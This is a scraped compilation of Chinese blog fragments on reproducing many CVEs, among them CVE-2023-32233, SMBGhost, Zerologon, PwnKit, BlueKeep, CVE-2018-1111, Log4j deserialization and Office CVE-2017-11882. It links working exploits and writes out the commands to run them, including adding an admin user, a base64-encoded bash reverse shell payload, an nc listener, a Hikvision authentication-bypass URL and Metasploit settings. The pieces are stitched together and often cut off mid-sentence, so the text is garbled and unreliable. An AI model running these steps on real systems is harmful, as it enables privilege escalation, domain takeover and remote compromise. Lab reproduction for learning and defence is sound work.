[环境搭建]: exp下载地址:https://github.com/Liuk3r/CVE-2023-32233 首先进入超级用户模式: 执行命令:apt install gcc libmnl-dev poc二进制文件: 输入:gcc -Wall -o exploit exploit.c -lmnl -lnftnl 如果觉得以上太困难 个人推荐去大佬的环境下载地址,里面有做好的镜像,可以直接进行下面复现过程 pwd=8888 [复现过程]: 输入命令:cd ~ ls 查看根目录: 执行编译好的exp文件: . /exp 成功得到root权限: [参考资料]: Liuk3r/CVE-2023-32233:CVE-2023-32233:Linux内核中的安全漏洞CVE-2023-32233 (github.com ) CVE漏洞复现-CVE-2023-32233 NetFilter权限提升-CSDN博客 CVE-2023-32233 (LINUX内核权限提升漏洞)_cve-2023 提权-CSDN博客
目录 CVE-2020-0796 漏洞描述 漏洞危害等级 影响版本 漏洞复现 实现本地提权 CVE-2020-0796 漏洞描述 2020年3 月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在 Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。 10 Version 1909 for ARM64-based Systems Windows Server, Version 1909 (Server Core installation) 漏洞复现
作者-ohh 本次测试环境为w7 1.cve-2019-1388利用工具:https://github.com/jas502n/CVE-2019-1388 cve-2019-1388提权影响范围如下: 2.cve-2019-0803利用工具: https://github.com/k8gege/K8tools/blob/master/CVE-2019-0803.exe 漏洞影响范围: ? cve-2019-0803 cmd “net user admin999 admin /add” ?
近日,红帽官方发布了安全更新,修复了编号为CVE-2018-1111的远程代码执行漏洞,攻击者可以通过伪造DHCP服务器发送响应包,攻击红帽系统,获取root权限并执行任意命令。 复现 环境 kali x64 centos 7 vmware14 设置网络 断开kali和centos的网络 将kali和centos都设置成主机模式,并且关闭主机的dhcp功能 ? bind-interfacesinterface=eth0except-interface=lodhcp-range=192.168.131.10,192.168.131.30,22hdhcp-option=3,192.168.131.52dhcp-option dnsmasq = '''bind-interfacesinterface=eth0except-interface=lodhcp-range={start},{end},22hdhcp-option=3, p=process('bash') p.sendline('nc -l -p {port} -v'.format(port=port)) q.sendline(cm[-1]) time.sleep(3)
漏洞概述 (CVE-2020-0796 SMBGhost)该漏洞是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的,它可让远程且未经身份验证的攻击者在目标系统上执行任意代码。 的系统) Windows Server版本1909(服务器核心安装) 这里是我使用的Windows10版本的靶机 环境搭建 Kali虚拟机以及windows10虚拟机 可在虚拟机中搭建win10系统来进行复现 47D4C57E638DF8BF74C59261E2CE702D|/ 使用扫描工具来验证是否由该漏洞 https://github.com/ollypwn/SMBGhost 可以看到该版本是具有SMBv3 RCE漏洞的 漏洞复现 EXP地址: https://github.com/chompie1337/SMBGhost_RCE_PoC 该exp使用环境为python3 下载完成后将该exp放到Kali虚拟机中 本地提权POC https://github.com/danigargu/CVE-2020-0796 编译好了的版本如下: https://github.com/danigargu/CVE-2020-
本文作者:Taoing(Ms08067实验室 SRSP TEAM 核心成员) Apache Log4j Server 反序列化命令执行漏洞(CVE‐2017‐5645) 一、漏洞原理 Apache 二、环境搭建 cd /vulhub/log4j/CVE‐2017‐5645 #进入环境目录 docker‐compose build && docker‐compose up ‐d 三、漏洞复现 payload 使用ysoserial生成payload,然后直接发送给your‐ip:4712端口即可。 执行docker‐compose exec log4j bash进容器 可见 /tmp/CVE‐2017‐5645_is_success已成功创建: ? runtime‐exec‐payloads.html #命令编码工具 java ‐jar ysoserial.jar CommonsCollections5 "bash ‐c {echo,YmFzaCAtaSA+JiAvZGV 2L3RjcC84LjIxMC4yMzUuMjQ5Lzk5ODggMD4mMQ
cve-2021-4034复现 影响范围 exp 打码 复现 参考 cve-2021-4034复现 Linux Polkit 本地提权漏洞 cvss评分 7.8 高危 polkit的pkexec 存在本地权限提升漏洞 执行php的iconv函数 ,本质是调用 glibc的 iconv_open 函数 3. iconv_open 函数 依照 GCONV_PATH 找到 gconv-modules 文件 4. gconv") # 创建特殊文件 ''' mknod name {b|c} major minor mknod name {p} 创建FIFO 已命名的管道 mknod dev/null c 1 3 ))(*argv, None) cenv = (c_char_p * (len(envp) + 1))(*envp, None) libc.execve(cmd, cargv, cenv) # 执行 复现
0x02 漏洞概述 (CVE-2020-0796 SMBGhost)该漏洞是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的,它可让远程且未经身份验证的攻击者在目标系统上执行任意代码。 1909版(用于基于ARM64的系统) Windows Server版本1909(服务器核心安装) 0x04 环境搭建 Kali虚拟机以及windows10虚拟机 可在虚拟机中搭建win10系统来进行复现 business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|/ 0x05 漏洞复现 如复现没有成功可能的原因有: 1.msf监听端口被占用 2.windows10设置自动更新已自动打补丁 3.shellcode未替换正确 4.exp端口和msf监听端口不一致 0x06 修复方式 目前厂商已发布升级补丁以修复漏洞 ,补丁获取链接: https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2020-0796 或者你可以使用以下PowerShell
Repository Manager OSS/Pro 3.6.2-3.14.0 0X2 环境搭建 漏洞环境安装包下载链接 https://help.sonatype.com/repomanager3/ download/download-archives---repository-manager-3 在这里,我们下载nexus-3.13.0-01-unix.tar.gz安装包。 0X3漏洞利用 环境的默认账户密码是admin/admin123,登录之后,上传一个任意jar文件。而真实环境则不需要,因为真实环境已经上传了assert。如下图所示。 ? 然后下载漏洞利用脚本 https://github.com/mpgn/CVE-2019-7238 ? RCE-%E5%88%86%E6%9E%90-%E3%80%90CVE-2019-7238%E3%80%91/
-2020-1472 cd CVE-2020-1472\ pip install -r requirements.txt python zerologon_tester.py DC_NETBIOS_NAME 整个利用过程大概是下列流程 置空域控保存在AD中的密码 获取域控用户HASH 通过获取到的管理员HASH得到一个SHELL,然后连接上去导出原来计算机中本地保存的HASH 通过获取到的HASH恢复置空的域控密码 利用复现 下载EXP # ~/impacket/ cd examples git clone https://github.com/dirkjanm/CVE-2020-1472 cd CVE-2020-1472 \ 置空密码 # ~impacket/examples/CVE-2020-1472 python cve-2020-1472-exploit.py DC_NETBIOS_NAME DC_IP_ADDR 修复建议 安装符合操作系统的漏洞补丁,详情请见:https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2020-1472
影响版本 1、Red Hat Enterprise Linux Server 6 2、Red Hat Enterprise Linux Server 7 3、CentOS 6 4、CentOS 7 漏洞详情 漏洞复现过程 环境准备 这里我用的测试机器系统分别是Centos 7 和 Kali 2018.2。 Centos 7 作为被攻击机,需要设置自动获取 ip 地址。 dhcp-option 3 网关地址和 dhcp-option6 DNS 服务器均设置为 kali 本地网卡的 ip 地址,kali 的 ip 地址为静态 ip。 CVE2018-1111 漏洞复现到此结束~! 通过本文,大家可以学习到如何用 dnsmasq 来快速搭建一个 DNS 服务或者 DHCP 服务,并对 DHCP 服务的 option 部分值和含义有相关了解,以及学习了 CVE2018-1111 漏洞的复现及环境搭建
0x02 漏洞概述 编号:CVE-2020-29436 /service/rest/internal/ui/saml接口允许加载外部dtd。 /repomanager3/download/download-archives---repository-manager-3 ? 本次复现使用版本为3.28.1 解压后,到nexus-3.28.1-01\bin目录下 命令行运行:nexus.exe /run 稍等一会,出现下图,表示启动成功 ? 登陆失败,百度一下: cd /sonatype-work/nexus3 找到admin.password,密码就是那一串字符: ? 0x05 漏洞复现 访问: http://yourhost:8081/#admin/security/saml ?
CVE-2017-8464是Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
CVE官方给出的提示: welcome.php页面存在SQL注入,并且这个参数是eid 打开靶场环境: 页面是一个登陆注册的界面 用户注册: 1 01@0.com 123456 sqlmap -r flag.txt -D ctf -T flag -C flag --dump --batch 回显如下: 得出flag: flag{cdadbe80-6b13-4ce7-bd86-3ff050dd36d3
3420557312|B58548681854236C7939003B583A8078|/ 可以自行下载学习 在github上找到了k8师傅写的批量检测工具; https://github.com/k8gege/CVE 2019-0708#%E5%BE%AE%E8%BD%AF3389%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9Ecve-20190708%E6%89%B9%E9%87%8F%E6%A3%
作者-Beginner 0x01 CVE-2017-7921漏洞复现 许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。 ? 0x02 漏洞复现: 利用Goby发现漏洞(CVE-2017-7921): ? 利用路径:/Security/users?auth=YWRtaW46MTEK 附:检索所有用户及其角色的列表 ?
项目地址 cnsimo/CVE-2020-2551 CVE-2020-2551 weblogic iiop 反序列化漏洞 该项目的搭建脚本在10.3.6版本经过测试,12版本未测试。 使用方法 先git clone https://github.com/cnsimo/CVE-2020-2551.git克隆本项目到本地。 建议所有操作都在一台机器上复现,避免网络问题导致的复现失败! ---- 项目引用 WeblogicEnvironment CVE-2020-2551 漏洞分析参考 WebLogic WLS核心组件RCE分析(CVE-2020-2551) - 安全客,安全资讯平台 Weblogic CVE-2020-2551 IIOP协议反序列化RCE – Y4er的博客 漫谈 WebLogic-CVE-2020-2551
前不久关于RDP的0708漏洞网上一片哀嚎,今天测试复现了一下,发现攻击之后,都会使得系统蓝屏。 CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。 2003 0X2 漏洞检测 各个厂家都已经发布了检测工具,在这里,我们使用开源的检测脚本,在msf上加载即可使用,下载链接: https://github.com/zerosum0x0/CVE 0X3 漏洞利用 使用任意一攻击脚本即可利用,下载https://github.com/Ekultek/BlueKeep 攻击即可,主机IP前后发生了变化 ? 可以看到2008环境被蓝屏。
2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。 漏洞影响版本: Office 365 Microsoft Office 2000 Microsoft Office 2003 Microsoft Office 2007 Service Pack 3 Microsoft Microsoft Office 2016 0x01 环境清单 WindowsServer 2008 (192.168.3.114) Office 2007 MAC OSX(192.168.3.106) 0X02 复现过程 将生成的hta文档放入WebServer根目录:http://192.168.3.106/evil.hta python webdav_exec_CVE-2017-11882.py -u http:// -> http://payloads.online/tools/cve-2017-11882/webdav_exec_CVE-2017-11882.py 生成rtf文档: 最后将test.rtf在目标机器上执行
0x02:复现环境 首先搭建环境,我这里使用的是win7旗舰版(家庭版升级而来),KALI自带的v5.0.45版本MSF。 /rdp/cve_2019_0708_bluekeep_rce.rb 3.使用攻击命令 使用msfconsole命令进入metasploit-framework框架 ? \ target 使用set RHOSTS 设置靶机IP 使用set RPORT 设置靶机PORT 使用set target ID数字(可选为1-4)每种都代表了机器架构 在我的复现环境中使用 target 3即可,如若不行尝试使用1,2,4 ? .html kali 更新msf: https://www.cnblogs.com/zuoxiaolongzzz/p/8927173.html CVE-2019-0708远程桌面代码执行漏洞复现: https